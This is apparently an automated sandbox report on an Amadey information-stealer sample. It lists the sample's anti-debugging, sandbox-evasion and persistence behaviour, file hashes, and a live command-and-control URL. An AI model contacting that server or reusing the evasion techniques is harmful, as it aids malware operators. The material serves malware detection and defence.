Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 42EC6B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 65F7D4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: D7EC6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: FAF7D4 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_051102FB rdtsc

0_2_051102FB

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1039	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1069	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 429	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1090	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1028	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1086	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5896	Thread sleep count: 1039 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5896	Thread sleep time: -2079039s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4692	Thread sleep count: 1030 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4692	Thread sleep time: -2061030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6164	Thread sleep count: 1069 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6164	Thread sleep time: -2139069s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5724	Thread sleep count: 429 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5724	Thread sleep time: -12870000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6260	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5092	Thread sleep count: 1090 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5092	Thread sleep time: -2181090s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5444	Thread sleep count: 1028 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5444	Thread sleep time: -2057028s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5956	Thread sleep count: 1086 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5956	Thread sleep time: -2173086s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: axplong.exe, axplong.exe, 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1600038784.00000000005B0000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1639212651.0000000000F00000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.1646334569.0000000000F00000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_04F30DEA Start: 04F30E1F End: 04F30DFE

7_2_04F30DEA

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_051102FB rdtsc

0_2_051102FB

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D4645B mov eax, dword ptr fs:[00000030h]		7_2_00D4645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00D4A1C2 mov eax, dword ptr fs:[00000030h]		7_2_00D4A1C2

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"

Jump to behavior

Source: axplong.exe, axplong.exe, 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: file.exe, 00000000.00000002.1600038784.00000000005B0000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.1639212651.0000000000F00000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.1646334569.0000000000F00000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: UBProgram Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_00D2D312 cpuid

7_2_00D2D312

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_00D2CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_00D2CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 3.2.axplong.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.axplong.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1639117763.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1600539276.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1599973179.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1559809614.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1935678537.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1598600536.0000000005310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1644644510.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	55%	ReversingLabs	Win32.Packed.Themida

Source	Detection	Scanner	Label
http://185.215.113.16/Jo89Ku7d/index.phpdeds	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpl	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpncodeda	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpk	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpj	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpG	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpcoded9	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpN	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php7	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpncoded	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpO	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpS	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpBg1&cm	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpw	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php0	100%	Avira URL Cloud	phishing

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.php	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.phpN	axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncodeda	axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpl	axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpk	axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpdeds	axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpj	axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpG	axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php7	axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpcoded9	axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpw	axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpS	axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phps	axplong.exe, 00000007.00000002.2783076434.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.php0	axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpBg1&cm	axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpO	axplong.exe, 00000007.00000002.2783076434.0000000000B69000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000007.00000002.2783076434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1520232
Start date and time:	2024-09-27 07:00:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@0/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 348 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 4916 because there are no executed function
Execution Graph export aborted for target file.exe, PID 3848 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
01:02:03	API Interceptor	1196330x Sleep call for process: axplong.exe modified
07:01:26	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.16	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, DarkTortilla	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	185.215.113.103
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1929216
Entropy (8bit):	7.948527260003782
Encrypted:	false
SSDEEP:	24576:sBXMvpr340IwfskIs1FtX9dfjiNrxKc9I82ev86U9knHyslZvZKm4JiL3QBf1Ci2:R6wfskJXdrimc9/rEgXnO8
MD5:	17DCD72D51948D374C79BE3A52BB647A
SHA1:	0C97827E45EA2420546FB335350648F5EA7F6B63
SHA-256:	6A0776DF2D53513AA8AA6152F52903AC8631F2438B3DFFCCB5EE0C9C8682A48E
SHA-512:	0ABAA9010FF909F7BD30200BA884161F56CC3A18B44CF8355BB5BA513B746EC0A87DAE7CB02E374814D419F53233AADAE894A3BDB9D641F43CE89914B5438F65
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f............................. L...........@..........................PL...........@.................................W...k.............................L.............................8.L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...mrrxutca.`....1..T..................@...gmpmgtcb......L......H..............@....taggant.0... L.."...N..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.4330849114389435
Encrypted:	false
SSDEEP:	6:Ar6tXAL1UEZ+lX1lOJUPelkDdtkHs+Zgty0lbVt0:tABQ1lOmeeDOZgtVxt0
MD5:	26A78AE0BF4544A69AA1DB55371C2694
SHA1:	C0B64EBD1A3B8B6B5878E29D531A58C228C1ABE7
SHA-256:	7DAD6ED7FBF5BDABD3E4EA2B871280CFB0EE50F73948BAF25002239E2CEDC375
SHA-512:	F97F294C1CBB11EC5742CFC23289D4808CAAC6E143D8A9ECE3221D7A923F770976413ACF2FA2EE54E90AC248CAAD373AE8ACCA626DAA7FC86483BBA143554702
Malicious:	false
Reputation:	low
Preview:	.... .)o.i.L.3..D.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.948527260003782
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'929'216 bytes
MD5:	17dcd72d51948d374c79be3a52bb647a
SHA1:	0c97827e45ea2420546fb335350648f5ea7f6b63
SHA256:	6a0776df2d53513aa8aa6152f52903ac8631f2438b3dffccb5ee0c9c8682a48e
SHA512:	0abaa9010ff909f7bd30200ba884161f56cc3a18b44cf8355bb5ba513b746ec0a87dae7cb02e374814d419f53233aadae894a3bdb9d641f43ce89914b5438f65
SSDEEP:	24576:sBXMvpr340IwfskIs1FtX9dfjiNrxKc9I82ev86U9knHyslZvZKm4JiL3QBf1Ci2:R6wfskJXdrimc9/rEgXnO8
TLSH:	D995337A0BAA2A16E4071F794D232B3E3A1BE554085F6EC13FEC16BF5D73A663900905
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8c2000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F5A152E5E6Ah
cmovle ebx, dword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
